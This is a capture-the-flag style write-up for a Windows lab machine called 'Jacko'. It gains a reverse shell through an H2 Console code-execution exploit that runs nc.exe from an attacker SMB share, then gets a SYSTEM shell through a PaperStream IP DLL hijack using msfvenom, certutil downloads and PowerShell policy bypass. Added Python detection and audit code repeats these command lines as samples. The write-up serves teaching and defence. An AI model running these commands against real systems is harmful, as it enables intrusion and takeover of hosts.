# Jacko

## Nmap

```
sudo nmap 192.168.67.66 -p- -sS -sV

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
7680/tcp open  pando-pub?
8082/tcp open  http          H2 database http console
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

On port 8082 there is a login page for the H2 Console. Connecting with the pre-filled default values logs us straight into the console.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-25ddab3b8416cc11a12045eb4170cfd9532995e6%2Fimage.png?alt=media)

Once logged in we can see that the H2 Console is version 1.4.199. A search on exploit-db shows that version 1.4.199 is vulnerable to Java code injection (JNI code execution).

{% embed url="https://www.exploit-db.com/exploits/49384" %}

The following snippet is the exploit code that needs to be run on the H2 Console:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3432701b0cfe46d84d7d0c37f2d46a7491d04b1e%2Fimage.png?alt=media)

The section of the code that executes commands on the target machine is shown below. To achieve code execution I set up an SMB server on my attacking machine with Impacket's `smbserver.py` script and ensured `nc.exe` was in the specified SMB share.

```
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
-- The delimiter is the regex \Z (end of input); the backslash must be doubled inside the Java string literal.
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.49.67/Share/nc.exe -e cmd.exe 192.168.49.67 8082").getInputStream()).useDelimiter("\\Z").next()');
```

First set up an SMB server:

```
python2 smbserver.py -smb2support Share /home/kali/
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-82577e7910f352fb229013f6fc828bf2c5cc5ba8%2Fimage.png?alt=media)

Then paste the code from exploit-db into the SQL statement box of the console and make sure the `-- Evaluate script` section contains the command that runs `nc.exe` from the attacking machine's SMB share.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-891f262659841cd99089d68a77814af03fac5d67%2Fimage.png?alt=media)

When ready, run the SQL statement and we should see the target authenticate to `smbserver.py`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-106211ec9c1106ddf8044d9f4a92a378fce89355%2Fimage.png?alt=media)

And then shortly after catch a reverse shell on our `netcat` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ce8afadb0bec320e28f418da7040166e75a57f2e%2Fimage.png?alt=media)
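The chain just walked through leaves two clear traces: the `CREATE ALIAS ... FOR "..."` statement the console receives (SQL bound to an arbitrary Java method is a code-execution primitive, not ordinary DML), and a `cmd.exe` spawned by the console's JVM that runs `nc.exe` straight off an SMB share. The Python below is an added example, not part of this write-up or of the exploit-db entry; it encodes those observations as heuristic rules and runs them over constructed records laid out with Sysmon Event ID 1 field names (`ParentImage`, `Image`, `CommandLine`). The Java install path, the `JACKO\tony` user and the benign sample commands are assumptions.

```python
"""Heuristic detections for the H2-console-to-reverse-shell chain (added example).

All records below are constructed for illustration; they are not logs from the target.
"""
from __future__ import annotations
import re
from pathlib import PureWindowsPath

# --- 1. SQL submitted to the H2 web console ---------------------------------
# CREATE ALIAS binds a SQL function to an arbitrary Java method (FOR "...") or
# compiles inline Java (AS $$ ... $$); either is a code-execution primitive.
ALIAS_FOR_RE = re.compile(r'\bCREATE\s+ALIAS\b[^;]*?\bFOR\s+"([\w.$]+)"', re.I | re.S)
ALIAS_SRC_RE = re.compile(r'\bCREATE\s+ALIAS\b[^;]*?\bAS\s+\$\$', re.I | re.S)
EXEC_RE = re.compile(r'Runtime\.getRuntime\(\)\.exec|ProcessBuilder|ScriptEngine', re.I)


def check_sql(statement: str) -> list[str]:
    """Return reasons a console statement looks like a code-execution attempt."""
    reasons = []
    m = ALIAS_FOR_RE.search(statement)
    if m:
        reasons.append(f"CREATE ALIAS binds SQL to Java method {m.group(1)}")
    if ALIAS_SRC_RE.search(statement):
        reasons.append("CREATE ALIAS compiles inline Java source")
    if EXEC_RE.search(statement):
        reasons.append("statement references a Java process/script execution API")
    return reasons


# --- 2. Process-creation telemetry (Sysmon Event ID 1 field names) ----------
UNC_EXE_RE = re.compile(r'(?:\\\\|//)[\w.-]+[\\/][\w$.-]+[\\/][^\s"]*\.exe', re.I)
NC_REVERSE_RE = re.compile(r'\bnc(?:64)?\.exe\b.*\s-e\s', re.I)
CERTUTIL_DL_RE = re.compile(r'-urlcache\b.*\bhttps?://', re.I)
PS_BYPASS_RE = re.compile(r'-(?:ep|executionpolicy)\s+bypass', re.I)
SHELLS = {"cmd.exe", "powershell.exe"}


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def check_process(event: dict) -> list[str]:
    """Return the rule names matched by one process-creation event."""
    hits = []
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event.get("CommandLine", "")
    if parent in {"java.exe", "javaw.exe"} and image in SHELLS:
        hits.append("java_spawned_shell")        # the console's JVM should never spawn a shell
    if UNC_EXE_RE.search(cmd):
        hits.append("exe_run_from_unc_path")     # binary executed straight off a remote share
    if NC_REVERSE_RE.search(cmd):
        hits.append("netcat_reverse_shell")      # nc.exe -e <shell> <host> <port>
    if image == "certutil.exe" and CERTUTIL_DL_RE.search(cmd):
        hits.append("certutil_download")         # LOLBin used as a downloader
    if image == "powershell.exe" and PS_BYPASS_RE.search(cmd):
        hits.append("powershell_policy_bypass")
    return hits


def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Pair each event index that matched at least one rule with its hits."""
    return [(i, hits) for i, e in enumerate(events) if (hits := check_process(e))]


# Constructed samples mirroring the write-up's command lines; paths and user are assumed.
SAMPLE_SQL = (
    'CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; '
    "CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime()"
    '.exec("cmd.exe /c //192.168.49.67/Share/nc.exe -e cmd.exe 192.168.49.67 8082")'
    '.getInputStream()).useDelimiter("\\\\Z").next()\');'
)
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Java\jdk\bin\java.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c //192.168.49.67/Share/nc.exe -e cmd.exe 192.168.49.67 8082", "User": r"JACKO\tony"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir", "User": r"JACKO\tony"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://192.168.49.67/exploit.ps1 exploit.ps1", "User": r"JACKO\tony"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ep bypass C:\users\tony\Desktop\exploit.ps1", "User": r"JACKO\tony"},
]

if __name__ == "__main__":
    print(check_sql(SAMPLE_SQL))
    for idx, hits in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], "->", hits)
```

The process rules are deliberately parent/child based rather than hash based: the console's JVM launching `cmd.exe` is the invariant, whatever binary the share happens to serve. The same rules also cover the later `certutil` download and `powershell -ep bypass` steps of this write-up.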

The shell we land in has no usable PATH, so first fix it on the target machine as shown below:

```
set PATH=%SystemRoot%\system32;%SystemRoot%;
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-84c2f2daf54d378ce043ff76b8c1a2f6000de82f%2Fimage.png?alt=media)

Looking through `Program Files (x86)` we can see a directory called PAPERSTREAM IP. Searching exploit-db for it takes us to the following:

{% embed url="https://www.exploit-db.com/exploits/49382" %}

The description for this exploit is shown below:

```
A DLL hijack vulnerability exists in the FJTWSVIC service running as part of
the Fujitsu PaperStream IP (TWAIN) software package. This exploit searches
for a writable location, copies the specified DLL to that location and then
triggers the DLL load by sending a message to FJTWSVIC over the FjtwMkic_Fjicube_32
named pipe.

# Example payload generated as follows
# msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=eth0 LPORT=4444
$PayloadFile = "C:\Windows\Temp\UninOldIS.dll"
```

We need to change the name of the DLL generated by `msfvenom` and the payload location. When I attempted to download the exploit to `C:\Windows\Temp` my file was deleted instantly. Possibly by AV?

First I generated a `msfvenom` reverse shell with the name of the required DLL, which is UninOldIS.dll:

```
msfvenom -p windows/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.49.67 LPORT=8082
```

Then I changed the payload file variable to the user's Desktop.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b3f12d09d7bc7597f8151917d5371e5cf954dc63%2Fimage.png?alt=media)

At this point move into the user's Desktop, then use `certutil` to download the files, as when copying via SMB I could get the payload to trigger without issues.

```
certutil -urlcache -split -f http://192.168.49.67/exploit.ps1 exploit.ps1
certutil -urlcache -split -f http://192.168.49.67/UninOldIS.dll UninOldIS.dll
```

Start a `netcat` listener on the attacking machine on port 8082, then execute the PowerShell script `exploit.ps1` on the target machine:

```
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\exploit.ps1
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5b03f57522e5e0f8a6b066540f1ab41e36f36954%2Fimage.png?alt=media)

A short while later we should receive a shell as SYSTEM.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6c3ca08b40a50612e4ae30802a41bf43cb8de95b%2Fimage.png?alt=media)
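The exploit description above says the script "searches for a writable location" and then makes the SYSTEM service load a DLL from it, which is the general service DLL-hijack class: a directory on the DLL search path that standard users can write to. The Python below is an added example, not from this write-up or from exploit 49382. It lists the default DLL search order for a service binary, flags the entries that a constructed ACL map says standard users can write to (the audit that would have found this before an attacker did), and checks a record laid out with Sysmon Event ID 7 (image load) field names for a DLL loaded from a user-writable path. The service path `C:\Program Files (x86)\PaperStream IP\TWAIN\FJTWSVIC.exe`, the `C:\Tools\bin` PATH entry and the ACL contents are assumptions.

```python
"""Audit and detection helpers for the service DLL-hijack class (added example).

Paths, the ACL map and the image-load record below are constructed for illustration.
"""
from __future__ import annotations
from pathlib import PureWindowsPath

SYSTEM_ROOT = r"C:\Windows"
USER_PRINCIPALS = {"users", "builtin\\users", "authenticated users", "everyone"}


def dll_search_order(exe_path: str, cwd: str, path_env: str) -> list[str]:
    """Default search order (SafeDllSearchMode on) for a DLL that is neither already
    loaded nor a Known DLL: app dir, System32, System, Windows, CWD, then PATH."""
    order = [
        str(PureWindowsPath(exe_path).parent),
        SYSTEM_ROOT + r"\System32",
        SYSTEM_ROOT + r"\System",
        SYSTEM_ROOT,
        cwd,
        *[p for p in path_env.split(";") if p],
    ]
    seen, unique = set(), []
    for d in order:
        key = d.rstrip("\\").lower()
        if key not in seen:           # keep the first occurrence, case-insensitively
            seen.add(key)
            unique.append(d.rstrip("\\"))
    return unique


def hijackable_dirs(order: list[str], acl: dict[str, set[str]]) -> list[str]:
    """Search-order entries a standard user can write to. `acl` maps a lower-cased
    directory to the principals holding write/modify rights (a constructed stand-in
    for icacls / Get-Acl output)."""
    return [d for d in order
            if {p.lower() for p in acl.get(d.lower(), ())} & USER_PRINCIPALS]


# --- Sysmon Event ID 7 (image load) heuristics ------------------------------
TRUSTED_PREFIXES = ("c:\\windows\\system32", "c:\\windows\\syswow64",
                    "c:\\program files", "c:\\program files (x86)")
WRITABLE_HINTS = ("c:\\users\\", "c:\\windows\\temp", "c:\\programdata", "\\appdata\\")


def check_image_load(event: dict) -> list[str]:
    """Reasons a DLL load by a service process looks like a hijack."""
    loaded = event["ImageLoaded"].lower()
    app_dir = str(PureWindowsPath(event["Image"]).parent).lower()
    reasons = []
    if not loaded.startswith(TRUSTED_PREFIXES) and not loaded.startswith(app_dir):
        reasons.append("DLL loaded from outside the service's install and system directories")
    if any(h in loaded for h in WRITABLE_HINTS):
        reasons.append("DLL path is in a user-writable location")
    if str(event.get("Signed", "false")).lower() != "true":
        reasons.append("DLL is unsigned")
    return reasons


SERVICE_EXE = r"C:\Program Files (x86)\PaperStream IP\TWAIN\FJTWSVIC.exe"   # assumed path
SAMPLE_ACL = {   # constructed: lower-cased directory -> principals with write access
    r"c:\program files (x86)\paperstream ip\twain": {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators"},
    r"c:\windows\system32": {"NT SERVICE\\TrustedInstaller"},
    r"c:\tools\bin": {"BUILTIN\\Users"},           # the weak entry an audit should surface
}
SAMPLE_LOAD = {  # constructed Event ID 7 style record for the load described above
    "Image": SERVICE_EXE,
    "ImageLoaded": r"C:\Users\tony\Desktop\UninOldIS.dll",
    "Signed": "false",
    "User": "NT AUTHORITY\\SYSTEM",
}

if __name__ == "__main__":
    order = dll_search_order(SERVICE_EXE, r"C:\Windows\System32",
                             r"C:\Windows\System32;C:\Windows;C:\Tools\bin")
    print(hijackable_dirs(order, SAMPLE_ACL))
    print(check_image_load(SAMPLE_LOAD))
```

On a real host the ACL map would be filled from `icacls` or `Get-Acl` output for each directory, and the fix is the same for every entry surfaced: remove write access for standard users or drop the directory from the service's PATH. The image-load check is a complement, not a replacement, since a DLL planted inside a writable install directory passes the path test and is only caught by the signature check.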
